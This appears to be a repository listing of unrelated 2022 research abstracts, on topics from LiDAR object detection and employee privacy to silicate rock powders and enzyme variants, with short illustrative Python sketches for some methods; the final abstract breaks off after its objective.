Fatigue strength estimation is a costly manual material characterization process in which state-of-the-art approaches follow a standardized experiment and analysis procedure. In this paper, we examine a modular, Machine Learning-based approach for fatigue strength estimation that is likely to reduce the number of experiments and, thus, the overall experimental costs. Despite its high potential, deployment of a new approach in a real-life lab requires more than the theoretical definition and simulation. Therefore, we study the robustness of the approach against misspecification of the prior and discretization of the specified loads. We identify its applicability and its advantageous behavior over the state-of-the-art methods, potentially reducing the number of costly experiments.
Comparative study of 3D object detection frameworks based on LiDAR data and sensor fusion techniques
(2022)
Estimating and understanding the surroundings of the vehicle precisely forms the basic and crucial step for an autonomous vehicle. The perception system plays a significant role in providing an accurate interpretation of the vehicle's environment in real time. Generally, the perception system involves various subsystems such as localization, obstacle (static and dynamic) detection and avoidance, mapping systems, and others. For perceiving the environment, these vehicles are equipped with various exteroceptive (both passive and active) sensors, in particular cameras, radars, LiDARs, and others. These systems use deep learning techniques that transform the huge amount of data from the sensors into semantic information on which the object detection and localization tasks are performed. For numerous driving tasks, the location and depth information of a particular object is necessary to provide accurate results. 3D object detection methods, by utilizing the additional pose data from sensors such as LiDARs and stereo cameras, provide information on the size and location of the object. Based on recent research, 3D object detection frameworks performing object detection and localization on LiDAR data and sensor fusion techniques show significant improvement in their performance. In this work, we perform a comparative study of the effect of using LiDAR data in object detection frameworks and of the performance improvement achieved by sensor fusion techniques, discuss various state-of-the-art methods in both cases, conduct an experimental analysis, and provide future research directions.
We introduce canonical weight normalization for convolutional neural networks. Inspired by the canonical tensor decomposition, we express the weight tensors in so-called canonical networks as scaled sums of outer vector products. In particular, we train network weights in the decomposed form, where scale weights are optimized separately for each mode. Additionally, similarly to weight normalization, we include a global scaling parameter. We study the initialization of the canonical form by running the power method and by drawing randomly from Gaussian or uniform distributions. Our results indicate that we can replace the power method with cheaper initializations drawn from standard distributions. The canonical re-parametrization leads to competitive normalization performance on the MNIST, CIFAR10, and SVHN data sets. Moreover, the formulation simplifies network compression. Once training has converged, the canonical form allows convenient model-compression by truncating the parameter sums.
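For readers who want the parametrization spelled out, the snippet below is a small NumPy sketch of reconstructing a weight tensor from a rank-R canonical (CP) form with one scale vector per mode and a global gain; names such as `factors` and `mode_scales` are our own illustrative choices, and the exact parametrization in the paper may differ.

```python
import numpy as np

def canonical_weight(factors, mode_scales, global_scale):
    """Rebuild a weight tensor as a scaled sum of rank-1 outer products.

    factors      : one matrix per tensor mode, each of shape (mode_dim, R)
    mode_scales  : one length-R scale vector per mode (trained separately)
    global_scale : single scalar, analogous to the gain in weight normalization
    """
    R = factors[0].shape[1]
    weight = np.zeros([f.shape[0] for f in factors])
    for r in range(R):
        term = mode_scales[0][r] * factors[0][:, r]
        for f, s in zip(factors[1:], mode_scales[1:]):
            term = np.multiply.outer(term, s[r] * f[:, r])  # rank-1 outer product
        weight += term
    return global_scale * weight

# Example: a 16x8x3x3 convolution kernel expressed with rank R = 4
rng = np.random.default_rng(0)
dims, R = (16, 8, 3, 3), 4
factors = [rng.standard_normal((d, R)) for d in dims]
mode_scales = [np.ones(R) for _ in dims]
W = canonical_weight(factors, mode_scales, global_scale=1.0)
assert W.shape == dims
```

Truncating the sum over r to the largest terms after training is what makes the compression mentioned in the abstract convenient.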
Safety-critical applications like autonomous driving use Deep Neural Networks (DNNs) for object detection and segmentation. The DNNs fail to predict correctly when they observe an Out-of-Distribution (OOD) input, which can lead to catastrophic consequences. Existing OOD detection methods have been studied extensively for image inputs but have not been explored much for LiDAR inputs. In this study, we therefore propose two datasets for benchmarking OOD detection in 3D semantic segmentation. We used Maximum Softmax Probability and Entropy scores generated using Deep Ensembles and Flipout versions of RandLA-Net as OOD scores. We observed that Deep Ensembles outperform the Flipout model in OOD detection, with greater AUROC scores for both datasets.
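For reference, both OOD scores named above are cheap to compute from the averaged class probabilities of an ensemble. The sketch below shows one plausible formulation in NumPy (per point, from M ensemble members); the exact aggregation used in the study may differ.

```python
import numpy as np

def ood_scores(member_probs):
    """MSP and predictive-entropy scores from ensemble softmax outputs.

    member_probs : (M, N, C) array - M ensemble members, N points, C classes.
    Returns (msp, entropy); a low MSP or a high entropy flags a likely OOD point.
    """
    mean_probs = member_probs.mean(axis=0)                            # (N, C)
    msp = mean_probs.max(axis=1)                                      # confidence of top class
    entropy = -(mean_probs * np.log(mean_probs + 1e-12)).sum(axis=1)  # predictive uncertainty
    return msp, entropy

# Toy usage: 3 members, 5 points, 4 classes
probs = np.random.dirichlet(np.ones(4), size=(3, 5))   # shape (3, 5, 4)
msp, ent = ood_scores(probs)
```

Thresholding either score, or computing the AUROC over in- and out-of-distribution points, yields benchmark numbers of the kind reported in the abstract.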
The aim of this paper is to assess the objectives of farmers’ challenges in enhancing biodiversity. The so-called “trilemma” (WBGU 2021) of land use stems from the multiple demands made on land for the benefit of mitigating climate change, securing food and maintaining biodiversity. The agricultural sector is accused of maladministration: it is blamed for causing soil contamination, animal cruelty, bee mortality and climate change. That is why farmers are seen as key actors at all levels. They are, however, also key players when it comes to overcoming the problems of the future. Their supportive role is urgently needed, but farmers find themselves caught between a “rock” and a “hard place”. Consumers are calling for sustainable, environmentally friendly production and inexpensive food products that do not contain pesticide residues, demanding enough food for all. Farmers are restricted by the wants and needs of consumers who are influenced by interest groups and are exposed to direct and indirect influencing factors and their interdependencies. They are also tasked with balancing the scrutiny of the critical public on the one hand, and the control exercised by eager authorities on the other.
As part of the DINA (Diversity of Insects in Nature protected Areas) project, a trans- and interdisciplinary research study, we collected and surveyed data from farmers who are farming within or close to the 21 selected nature protected areas included in the DINA project. Data was collected as part of a mixed-method approach using a semi-structured questionnaire. The methodological and strategic approach and the interdependencies of issues demonstrate the complexity of today’s problems. To investigate this, we first collected data using questionnaires with closed and open questions. The conflicts and obstacles farmers face were evaluated, and the results show farmers’ willingness to implement biodiversity measures and the importance of the appreciation shown to farmers for doing so. The paper proposes some follow-up activities (quantitative study) to verify the objectives. The results will later lead to recommendations for policymakers and farmers in all German nature protected areas.
Vietnam requires sustainable urbanization, for which city sensing is used in planning and decision-making. Large cities need portable, scalable, and inexpensive digital technology for this purpose. End-to-end air quality monitoring companies such as AirVisual and Plume Air have shown their reliability with portable devices outfitted with superior air sensors. They are pricey, yet homeowners use them to get local air data without evaluating the causal effect. Our air quality inspection system is scalable, reasonably priced, and flexible. The system's minicomputer remotely monitors PMS7003 and BME280 sensor data through a microcontroller processor. The 5-megapixel camera module enables researchers to infer the causal relationship between traffic intensity and dust concentration. The design enables the use of inexpensive, commercial-grade hardware, with Azure Blob storing air pollution data and surrounding-area imagery and preventing the system from physically expanding. In addition, by including an air channel that replenishes and distributes temperature, the design improves ventilation and safeguards electrical components. The gadget allows for the analysis of the correlation between traffic and air quality data, which might aid in the establishment of sustainable urban development plans and policies.
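As an aside for readers reproducing such a setup: the PMS7003 particulate sensor reports its readings as fixed 32-byte binary frames over a serial line. The parser below is a minimal sketch assuming the commonly documented Plantower frame layout (start bytes 0x42 0x4D, a length word, thirteen big-endian 16-bit data words, 16-bit checksum); real deployments would add re-synchronization on the byte stream, and the BME280 readout is not shown.

```python
import struct

FRAME_LEN = 32   # 2 start bytes + 2 length bytes + 13 data words + 2 checksum bytes

def parse_pms7003_frame(frame: bytes):
    """Parse one 32-byte Plantower PMS7003 frame into PM readings.

    Returns a dict with the 'atmospheric environment' PM values, or None if
    the start bytes or the checksum do not match.
    """
    if len(frame) != FRAME_LEN or frame[0:2] != b"\x42\x4d":
        return None
    values = struct.unpack(">13H", frame[4:30])        # 13 big-endian data words
    checksum = struct.unpack(">H", frame[30:32])[0]
    if (sum(frame[0:30]) & 0xFFFF) != checksum:        # checksum covers all preceding bytes
        return None
    return {"pm1_0": values[3], "pm2_5": values[4], "pm10": values[5]}

# Build a synthetic frame for testing (payload values are arbitrary)
payload = struct.pack(">13H", 10, 16, 20, 9, 15, 18, 900, 260, 40, 4, 2, 1, 0)
body = b"\x42\x4d" + struct.pack(">H", 28) + payload
frame = body + struct.pack(">H", sum(body) & 0xFFFF)
print(parse_pms7003_frame(frame))    # {'pm1_0': 9, 'pm2_5': 15, 'pm10': 18}
```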
Therapeutic Treatments for Osteoporosis – Which Combination of Pills Is the Best among the Bad?
(2022)
Osteoporosis is a chronic, systemic skeletal disorder characterized by an increase in bone resorption, which leads to reduced bone density. The reduction in bone mineral density and the resulting low bone mass lead to an increased risk of fractures. Osteoporosis is caused by an imbalance in the normally strictly regulated bone homeostasis. This imbalance is caused by overactive bone-resorbing osteoclasts, whose activity bone-synthesizing osteoblasts do not compensate for. In this review, the underlying mechanism is presented, underpinned by in vitro and animal models used to investigate this imbalance, as well as the current status of clinical trials. Furthermore, new therapeutic strategies for osteoporosis are presented, such as anabolic and catabolic treatments and treatments using biomaterials and biomolecules. Another focus is on new combination therapies with multiple drugs, which are currently considered more beneficial for the treatment of osteoporosis than monotherapies. Taken together, this review starts with an overview and ends with the newest approaches to osteoporosis therapies and a future perspective not presented so far.
The processing of employees’ personal data is dramatically increasing, yet there is a lack of tools that allow employees to manage their privacy. In order to develop these tools, one needs to understand what sensitive personal data are and what factors influence employees’ willingness to disclose. Current privacy research, however, lacks such insights, as it has focused on other contexts in recent decades. To fill this research gap, we conducted a cross-sectional survey with 553 employees from Germany. Our survey provides multiple insights into the relationships between perceived data sensitivity and willingness to disclose in the employment context. Among other things, we show that the perceived sensitivity of certain types of data differs substantially from existing studies in other contexts. Moreover, currently used legal and contextual distinctions between different types of data do not accurately reflect the subtleties of employees’ perceptions. Instead, using 62 different data elements, we identified four groups of personal data that better reflect the multi-dimensionality of perceptions. However, previously found common disclosure antecedents in the context of online privacy do not seem to affect them. We further identified three groups of employees that differ in their perceived data sensitivity and willingness to disclose, but neither in their privacy beliefs nor in their demographics. Our findings thus provide employers, policy makers, and researchers with a better understanding of employees’ privacy perceptions and serve as a basis for future targeted research on specific types of personal data and employees.
The processing of employee personal data is dramatically increasing. To protect employees' fundamental right to privacy, the law provides for the implementation of privacy controls, including transparency and intervention. At present, however, the stakeholders responsible for putting these obligations into action, such as employers and software engineers, simply lack the fundamental knowledge needed to design and implement the necessary controls. Indeed, privacy research has so far focused mainly on consumer relations in the private context. In contrast, privacy in the employment context is less well studied. However, since privacy is highly context-dependent, existing knowledge and privacy controls from other contexts cannot simply be adopted to the employment context. In particular, privacy in employment is subject to different legal and social norms, which require a different conceptualization of the right to privacy than is usual in other contexts. To adequately address these aspects, there is broad consensus that privacy must be regarded as a socio-technical concept in which human factors must be considered alongside technical-legal factors. Today, however, there is a particular lack of knowledge about human factors in employee privacy. Disregarding the needs and concerns of individuals or lack of usability, though, are common reasons for the failure of privacy and security measures in practice. This dissertation addresses key knowledge gaps on human factors in employee privacy by presenting the results of a total of three in-depth studies with employees in Germany. The results provide insights into employees' perceptions of the right to privacy, as well as their perceptions and expectations regarding the processing of employee personal data. The insights gained provide a foundation for the human-centered design and implementation of employee-centric privacy controls, i.e., privacy controls that incorporate the views, expectations, and capabilities of employees. Specifically, this dissertation presents the first mental models of employees on the right to informational self-determination, the German equivalent of the right to privacy. The results provide insights into employees' (1) perceptions of categories of data, (2) familiarity and expectations of the right to privacy, and (3) perceptions of data processing, data flow, safeguards, and threat models. In addition, three major types of mental models are presented, each with a different conceptualization of the right to privacy and a different desire for control. Moreover, this dissertation provides multiple insights into employees' perceptions of data sensitivity and willingness to disclose personal data in employment. Specifically, it highlights the uniqueness of the employment context compared to other contexts and breaks down the multi-dimensionality of employees' perceptions of personal data. As a result, the dimensions in which employees perceive data are presented, and differences among employees are highlighted. This is complemented by identifying personal characteristics and attitudes toward employers, as well as toward the right to privacy, that influence these perceptions. Furthermore, this dissertation provides insights into practical aspects for the implementation of personal data management solutions to safeguard employee privacy. Specifically, it presents the results of a user-centered design study with employees who process personal data of other employees as part of their job. 
Based on the results obtained, a privacy pattern is presented that harmonizes privacy obligations with personal data processing activities. The pattern is useful for designing privacy controls that help these employees handle employee personal data in a privacy-compliant manner, taking into account their skills and knowledge, thus helping to protect employee privacy. The outcome of this dissertation benefits a wide range of stakeholders who are involved in the protection of employee privacy. For example, it highlights the challenges to be considered by employers and software engineers when conceptualizing and designing employee-centric privacy controls. Policymakers and researchers gain a better understanding of employees' perceptions of privacy and obtain fundamental knowledge for future research into theoretical and abstract concepts or practical issues of employee privacy. Employers, IT engineers, and researchers gain insights into ways to empower data processing employees to handle employee personal data in a privacy-compliant manner, enabling employers to improve and promote compliance. Since the basic principles underlying informational self-determination have been incorporated into European privacy legislation, we are confident that our results are also of relevance to stakeholders outside Germany.
In March 2020, the world was hit by the coronavirus disease (COVID‐19) pandemic which led to all‐embracing measures to contain its spread. Most employees were forced to work from home and take care of their children because schools and daycares were closed. We present data from a research project in a large multinational organisation in the Netherlands with monthly quantitative measurements from January to May 2020 (N = 253–516), enriched with qualitative data from participants' comments before and after telework had started. Growth curve modelling showed major changes in employees' work‐related well‐being reflected in decreasing work engagement and increasing job satisfaction. For work‐non‐work balance, workload and autonomy, cubic trends over time were found, reflecting initial declines during crisis onset (March/April) and recovery in May. Participants' additional remarks exemplify that employees struggled with fulfilling different roles simultaneously, developing new routines and managing boundaries between life domains. Moderation analyses demonstrated that demographic variables shaped time trends. The diverging trends in well‐being indicators raise intriguing questions and show that close monitoring and fine‐grained analyses are needed to arrive at a better understanding of the impact of the crisis across time and among different groups of employees.
Soil nutrient depletion threatens global food security and has been seriously underestimated for potassium (K) and several micronutrients. This is particularly the case for highly weathered soils in tropical countries, where classical soluble fertilizers are often not affordable or not accessible. One way to replenish macro- and micronutrients is ground silicate rock powders (SRPs). Rock-forming silicate minerals contain most nutrients essential for higher plants, yet slow and inconsistent weathering rates have restricted their use in the past. Recent findings, however, challenge past agronomic objections which insufficiently addressed the factorial complexity of the weathering process. This review therefore first presents a framework with the most relevant factors for the weathering of SRPs through which several outcomes of prior studies can be explained. A subsequent analysis of 48 crop trials reveals the potential as alternative K source and multi-nutrient soil amendment for tropical soils, whereas the benefits for temperate soils are currently inconclusive. Beneficial results prevail for mafic and ultramafic rocks like basalts and rocks containing nepheline or glauconite. Several rock modifications are highly efficient in increasing the agronomic effectiveness of SRPs. Enhanced weathering of SRPs could additionally sequester substantial amounts of CO2 from the atmosphere, and silicon (Si) supply can induce a broad spectrum of plant biotic and abiotic stress resistance. Recycling massive amounts of rock residues from domestic mining industries could furthermore resolve serious disposal challenges and improve fertilizer self-sufficiency. In conclusion, under the right circumstances, SRPs could not only advance low-cost and regional soil-sustaining crop production but also contribute to various sustainable development goals.
Remineralizing soils? The agricultural usage of silicate rock powders in the context of One Health
(2022)
The concept of soil health describes the capacity of soil to fulfill essential functions and ecosystem services. Healthy soils are inextricably linked to sustainable agriculture and are crucial for the interconnected health of plants, animals, humans, and their environment ("One Health"). However, soil health is threatened through unprecedented rates of soil degradation. A major form of soil degradation is nutrient depletion, which has been seriously underestimated for potassium (K) and several micronutrients. One way to replenish K and micronutrients is multi-nutrient silicate rock powders (SRPs). Their agronomic suitability has long been questioned due to slow weathering rates, although recent studies found significant soil health improvements and challenge past objections which insufficiently addressed the factorial complexity of the weathering process. Furthermore, environmental co-benefits might arise through their mixture with livestock slurry, which could reduce the slurry’s ammonia (NH3) emissions and improve its biophysicochemical properties. However, neither SRPs’ effects on soil health nor the biophysicochemical effects of mixing SRPs with livestock slurry have hitherto been comprehensively analyzed. The overall aim of this dissertation is thus to review the agricultural usage of SRPs in the context of One Health. The first part of this thesis starts with an elaboration of the health concept in general and then explores the interlinkages between soil health and One Health. Subsequently, the potentials and oftentimes bypassed problems of operationalizing soil health are outlined, and feasible ways for its future usage are proposed. In the second part of the thesis, it is reviewed how and under which circumstances SRPs can ameliorate soil health. This is done by presenting a new framework with the most relevant factors for the usage of SRPs through which several contradictory outcomes of prior studies can be explained. A subsequent analysis of 48 crop trials reveals the potential of SRPs as a K and multi-nutrient soil amendment for tropical soils, whereas the benefits for temperate soils are inconclusive. The review revealed various co-benefits that could substantially increase SRPs’ overall agronomic efficiency. The last part of the thesis reports on the effects of mixing two rock powders with cattle slurry. SRPs significantly increased the slurry’s CH4 emission rates, whereas the effects on NH3, CO2, and N2O emission rates were mostly insignificant. The rock powders increased the nutrient content of the slurry and altered its microbiology. In conclusion, the concept of soil health must be operationalized in more specific, practical, and context-dependent ways. Particularly in humid tropical environments, SRPs could advance low-cost soil health ameliorations, and their usage could have additional co-benefits regarding One Health. Mixing SRPs with organic materials like livestock slurry could overcome the major obstacle of their low solubility, although the effects on NH3 and greenhouse gas emissions must be further evaluated.
In robot-assisted therapy for individuals with Autism Spectrum Disorder, the workload of therapists during a therapeutic session is increased if they have to control the robot manually. To allow therapists to focus on the interaction with the person instead, the robot should be more autonomous, namely it should be able to interpret the person's state and continuously adapt its actions according to their behaviour. In this paper, we develop a personalised robot behaviour model that can be used in the robot decision-making process during an activity; this behaviour model is trained with the help of a user model that has been learned from real interaction data. We use Q-learning for this task; the results demonstrate that the policy requires about 10,000 iterations to converge. We thus investigate policy transfer for improving the convergence speed; we show that this is a feasible solution, but an inappropriate initial policy can lead to a suboptimal final return.
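To make the learning setup above concrete, the following is a minimal tabular Q-learning sketch in which the learned user model is abstracted as a callable returning the next state and reward, and policy transfer is realized by initializing the Q-table from one trained for another user. The state/action spaces, episode length, and hyperparameters are illustrative assumptions; the paper's actual representation is not reproduced here.

```python
import numpy as np

def q_learning(user_model, n_states, n_actions, episodes=10_000,
               alpha=0.1, gamma=0.95, epsilon=0.1, q_init=None):
    """Tabular Q-learning against a simulated user model.

    user_model(state, action) -> (next_state, reward) stands in for the user
    model learned from interaction data; q_init enables policy transfer by
    starting from a Q-table trained for a different user.
    """
    Q = np.zeros((n_states, n_actions)) if q_init is None else q_init.copy()
    rng = np.random.default_rng(0)
    for _ in range(episodes):
        s = int(rng.integers(n_states))
        for _ in range(50):                        # bounded episode length
            if rng.random() < epsilon:             # epsilon-greedy exploration
                a = int(rng.integers(n_actions))
            else:
                a = int(Q[s].argmax())
            s_next, r = user_model(s, a)
            # standard one-step Q-learning update
            Q[s, a] += alpha * (r + gamma * Q[s_next].max() - Q[s, a])
            s = s_next
    return Q

# Toy user model: action 1 "engages" the user (reward 1), any action moves the state
toy_user = lambda s, a: ((s + a) % 5, 1.0 if a == 1 else 0.0)
Q_first = q_learning(toy_user, n_states=5, n_actions=3)
Q_second = q_learning(toy_user, n_states=5, n_actions=3, q_init=Q_first)  # transfer
```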
It is challenging to provide users with a haptic weight sensation of virtual objects in VR since current consumer VR controllers and software-based approaches such as pseudo-haptics cannot render appropriate haptic stimuli. To overcome these limitations, we developed a haptic VR controller named Triggermuscle that adjusts its trigger resistance according to the weight of a virtual object. Therefore, users need to adapt their index finger force to grab objects of different virtual weights. Dynamic and continuous adjustment is enabled by a spring mechanism inside the casing of an HTC Vive controller. In two user studies, we explored the effect on weight perception and found large differences between participants for sensing change in trigger resistance and thus for discriminating virtual weights. The variations were easily distinguished and associated with weight by some participants while others did not notice them at all. We discuss possible limitations, confounding factors, how to overcome them in future research and the pros and cons of this novel technology.
In recent years, the ability of intelligent systems to be understood by developers and users has received growing attention. This holds in particular for social robots, which are supposed to act autonomously in the vicinity of human users and are known to raise peculiar, often unrealistic attributions and expectations. However, explainable models that, on the one hand, allow a robot to generate lively and autonomous behavior and, on the other, enable it to provide human-compatible explanations for this behavior are missing. In order to develop such a self-explaining autonomous social robot, we have equipped a robot with own needs that autonomously trigger intentions and proactive behavior, and form the basis for understandable self-explanations. Previous research has shown that undesirable robot behavior is rated more positively after receiving an explanation. We thus aim to equip a social robot with the capability to automatically generate verbal explanations of its own behavior, by tracing its internal decision-making routes. The goal is to generate social robot behavior in a way that is generally interpretable, and therefore explainable on a socio-behavioral level increasing users' understanding of the robot's behavior. In this article, we present a social robot interaction architecture, designed to autonomously generate social behavior and self-explanations. We set out requirements for explainable behavior generation architectures and propose a socio-interactive framework for behavior explanations in social human-robot interactions that enables explaining and elaborating according to users' needs for explanation that emerge within an interaction. Consequently, we introduce an interactive explanation dialog flow concept that incorporates empirically validated explanation types. These concepts are realized within the interaction architecture of a social robot, and integrated with its dialog processing modules. We present the components of this interaction architecture and explain their integration to autonomously generate social behaviors as well as verbal self-explanations. Lastly, we report results from a qualitative evaluation of a working prototype in a laboratory setting, showing that (1) the robot is able to autonomously generate naturalistic social behavior, and (2) the robot is able to verbally self-explain its behavior to the user in line with users' requests.
This paper investigates the effect of voltage sensors on the measurement of transient voltages for power semiconductors in a Double Pulse Test (DPT) environment. We adapt previously published models that were developed for current sensors and apply them to voltage sensors to evaluate their suitability for DPT applications. Similarities and differences between transient current and voltage sensors are investigated and the resulting methodology is applied to commercially available and experimental voltage sensors. Finally, a selection aid for given measurement tasks is derived that focuses on the measurement of fast-switching power semiconductors.
Collaboration among multiple users on large screens leads to complicated behavior patterns and group dynamics. To gain a deeper understanding of collaboration on vertical, large, high-resolution screens, this dissertation builds on previous research and gains novel insights through new observational studies. Among other things, the collected results reveal new patterns of collaborative coupling, suggest that territorial behavior is less critical than shown in previous research, and demonstrate that workspace awareness can also negatively affect the effectiveness of individual users.
Recovery Across Different Temporal Settings: How Lunchtime Activities Influence Evening Activities
(2022)
Recovery from work stress during workday breaks, free evenings, weekends, and vacations is known to benefit employee health and well-being. However, how recovery in these different temporal settings is interconnected is not well understood. We hypothesized that on days when employees engage in recovery-enhancing lunchtime activities, they will experience higher resources when leaving work (i.e., low fatigue and high positive affect) and consequently spend more time on recovery-enhancing activities in the evening, thus creating a positive recovery cycle. In this study, 97 employees were randomized into lunchtime park walk and relaxation groups. As evening activities, we measured time spent on physical exercise, physical activity in natural surroundings, and social activities. Afternoon resources and time spent on evening activities were assessed twice a week before, during, and after the intervention, for five weeks. Our results based on multilevel analyses showed that on days when employees completed the lunchtime park walk, they spent more time on evening physical exercise and physical activity in natural surroundings compared to days when the lunch break was spent as usual. However, neither lunchtime relaxation exercises nor afternoon resources were associated with any of the evening activities. Our findings suggest that factors other than afternoon resources are more important in determining how much time employees spend on various evening activities. Fifteen-minute lunchtime park walks inspired employees to engage in similar health-benefitting activities during their free time.
This project focuses on object detection in dense volume data. There are several types of dense volume data, namely Computed Tomography (CT) scans, Positron Emission Tomography (PET), and Magnetic Resonance Imaging (MRI); this work focuses on CT scans. CT scans are not limited to the medical domain; they are also used in industry, for example in airport baggage screening and on assembly lines, and the object detection systems in these settings should be able to detect objects fast. One way to address the issue of computational complexity and make object detection systems fast is to use low-resolution images: low-resolution CT scanning is fast, so the entire process of scanning and detection can be accelerated. Even in the medical domain, the exposure time of the patient should be reduced to lower the radiation dose, which could be achieved by allowing low-resolution CT scans. Hence it is essential to find out which object detection model has better accuracy as well as speed on low-resolution CT scans. However, the existing approaches do not provide details about how a model performs when the resolution of CT scans is varied. Hence, the goal of this project is to analyze the impact of varying the resolution of CT scans on both the speed and accuracy of the model. Three object detection models, namely RetinaNet, YOLOv3, and YOLOv5, were trained at various resolutions. Among the three models, YOLOv5 had the best mAP and F1 score at multiple resolutions on the DeepLesion dataset, while the RetinaNet model had the lowest inference time. From the experiments, it can be asserted that sacrificing mean average precision (mAP) to improve inference time by reducing resolution is feasible.
Focus on what matters: improved feature selection techniques for personal thermal comfort modelling
(2022)
Occupants' personal thermal comfort (PTC) is indispensable for their well-being, physical and mental health, and work efficiency. Predicting PTC preferences in a smart home can be a prerequisite to adjusting the indoor temperature for providing a comfortable environment. In this research, we focus on identifying relevant features for predicting PTC preferences. We propose a machine learning-based predictive framework by employing supervised feature selection techniques. We apply two feature selection techniques to select the optimal sets of features to improve the thermal preference prediction performance. The experimental results on a public PTC dataset demonstrated the efficiency of the feature selection techniques that we have applied. In turn, our PTC prediction framework with feature selection techniques achieved state-of-the-art performance in terms of accuracy, Cohen's kappa, and area under the curve (AUC), outperforming conventional methods.
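To make the feature-selection step above concrete, here is a small, self-contained sketch using scikit-learn. The synthetic dataset, the choice of a filter method (mutual information) and a wrapper method (recursive feature elimination), and all parameter values are illustrative assumptions rather than the exact techniques and settings used in the paper.

```python
from sklearn.datasets import make_classification
from sklearn.ensemble import RandomForestClassifier
from sklearn.feature_selection import SelectKBest, mutual_info_classif, RFE
from sklearn.model_selection import cross_val_score

# Hypothetical stand-in for the PTC dataset: X holds indoor/outdoor and personal
# features, y holds thermal preference labels.
X, y = make_classification(n_samples=500, n_features=30, n_informative=8, random_state=0)

# Filter-based selection: keep the k features with the highest mutual information.
X_filter = SelectKBest(mutual_info_classif, k=10).fit_transform(X, y)

# Wrapper-based selection: recursive feature elimination with a tree ensemble.
rfe = RFE(RandomForestClassifier(n_estimators=100, random_state=0), n_features_to_select=10)
X_wrapper = rfe.fit_transform(X, y)

for name, X_sel in [("all features", X), ("filter", X_filter), ("wrapper", X_wrapper)]:
    acc = cross_val_score(RandomForestClassifier(random_state=0), X_sel, y, cv=5).mean()
    print(f"{name}: CV accuracy = {acc:.3f}")
```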
Due to expected positive impacts on business, the application of artificial intelligence has increased widely. The decision-making procedures of those models are often complex and not easily understandable to the company's stakeholders, i.e. the people who have to follow up on recommendations or try to understand automated decisions of a system. This opaqueness and black-box nature might hinder adoption, as users struggle to make sense of and trust the predictions of AI models. Recent research on eXplainable Artificial Intelligence (XAI) focused mainly on explaining the models to AI experts with the purpose of debugging and improving model performance. In this article, we explore how such systems could be made explainable to the stakeholders. To do so, we propose a new convolutional neural network (CNN)-based explainable predictive model for product backorder prediction in inventory management. Backorders are orders that customers place for products that are currently not in stock. The company then takes the risk of producing or acquiring the backordered products while, in the meantime, customers can cancel their orders if delivery takes too long, leaving the company with unsold items in its inventory. Hence, for their strategic inventory management, companies need to make decisions based on assumptions. Our argument is that these tasks can be improved by offering explanations for AI recommendations. Our research therefore investigates how such explanations could be provided, employing Shapley additive explanations to explain the model's overall priorities in decision-making. In addition, we introduce locally interpretable surrogate models that can explain any individual prediction of a model. The experimental results demonstrate effectiveness in predicting backorders in terms of standard evaluation metrics and outperform known related works with an AUC of 0.9489. Our approach demonstrates how current limitations of predictive technologies can be addressed in the business domain.
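As an illustration of the Shapley-value workflow mentioned above, the following sketch derives global feature priorities from SHAP values. A gradient-boosted classifier on synthetic data stands in for the article's CNN, and the background sample size and other settings are arbitrary assumptions.

```python
import numpy as np
import shap
from sklearn.datasets import make_classification
from sklearn.ensemble import GradientBoostingClassifier

# Illustrative stand-in for the backorder model: a tree ensemble on synthetic data
# (the article uses a CNN; the explanation workflow is analogous).
X, y = make_classification(n_samples=300, n_features=12, random_state=0)
model = GradientBoostingClassifier(random_state=0).fit(X, y)

# Shapley additive explanations: global feature priorities via mean |SHAP value|.
background = shap.sample(X, 50)                         # background sample for the explainer
explainer = shap.KernelExplainer(lambda d: model.predict_proba(d)[:, 1], background)
shap_values = explainer.shap_values(X[:20])             # explain 20 individual predictions
global_importance = np.abs(shap_values).mean(axis=0)
print("feature priorities (most to least important):", np.argsort(global_importance)[::-1])
```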
With the increasing demand for ultrapure water in the pharmaceutical and semiconductor industry, the need for precise measuring instruments for those applications is also growing. One critical parameter of water quality is the amount of total organic carbon (TOC). This work presents a system that uses the advantage of the increased oxidation power achieved with UV/O3 advanced oxidation process (AOP) for TOC measurement in combination with a significant miniaturization compared to the state of the art. The miniaturization is achieved by using polymer-electrolyte membrane (PEM) electrolysis cells for ozone generation in combination with UV-LEDs for irradiation of the measuring solution, as both components are significantly smaller than standard equipment. Conductivity measurement after oxidation is the measuring principle and measurements were carried out in the TOC range between 10 and 1000 ppb TOC. The suitability of the system for TOC measurement is demonstrated using the oxidation by ozonation combined with UV irradiation of defined concentrations of isopropyl alcohol (IPA).
The human enzymes GLYAT (glycine N-acyltransferase), GLYATL1 (glutamine N-phenylacetyltransferase) and GLYATL2 (glycine N-acyltransferase-like protein 2) are not only important in the detoxification of xenobiotics via the human liver, but are also involved in the elimination of acyl residues that accumulate in the form of their coenzyme A (coA) esters in some rare inborn errors of metabolism. This concerns, for example, disorders in the degradation of branched-chain amino acids, such as isovaleric acidemia or propionic acidemia. In addition, they also assist in the elimination of ammonium, which is produced during the transamination of amino acids and accumulates in urea cycle defects. Sequence variants of the enzymes have also been investigated, which may provide evidence of impaired enzyme activities, from which therapy adjustments can potentially be derived. A modified Escherichia coli strain was chosen for the overexpression and partial biochemical characterization of the enzymes, which may allow solubility and proper folding. Since post-translational protein modifications are very limited in bacteria, we also attempted to overexpress the enzymes in HEK293 cells (human-derived). In addition to characterization via immunoblots and activity assays, intracellular localization of the enzymes was also performed using GFP coupling and confocal laser scanning microscopy in transfected HEK293 cells. The GLYATL2 enzyme may have tasks beyond detoxification and metabolic defects and the preliminary molecular biology work has been performed as part of this project - the enzyme activity determinations were outsourced to a co-supervised bachelor thesis. The enzyme activity determinations with purified recombinant human enzyme from Escherichia coli provided a threefold higher activity of the sequence variant p.(Asn156Ser) for GLYAT, which should be considered as the probably authentic wild type of the enzyme. In addition, a reduced activity of the GLYAT variant p.(Gln61Leu), which is very common in South Africa, was shown, which could be of particular importance in the treatment of isovaleric acidemia, which is also common in South Africa. Intracellularly, GLYAT and GLYATL1 could be localized mitochondrially. As the analyses have shown, sequence variations of GLYAT and GLYATL1 influence their enzyme activity. As an example, the GLYAT variant p.(Gln61Leu) is frequently found in South Africa. In the case of reduced GLYAT activity, patients could be increasingly treated with L-carnitine in the sense of an individualized therapy, since the conjugation of the toxic isovaleryl-coA with glycine is restricted by the GLYAT sequence variation. Activity-reducing variants identified in this project are of particular interest, as they may influence the treatment of certain metabolic defects.
Background: There is a lack of cardiac magnetic resonance (CMR) data regarding mid- to long-term myocardial damage due to Covid-19 in elite athletes. Objective: This study investigated mid- to long-term consequences of myocardial involvement after a Covid-19 infection in elite athletes.
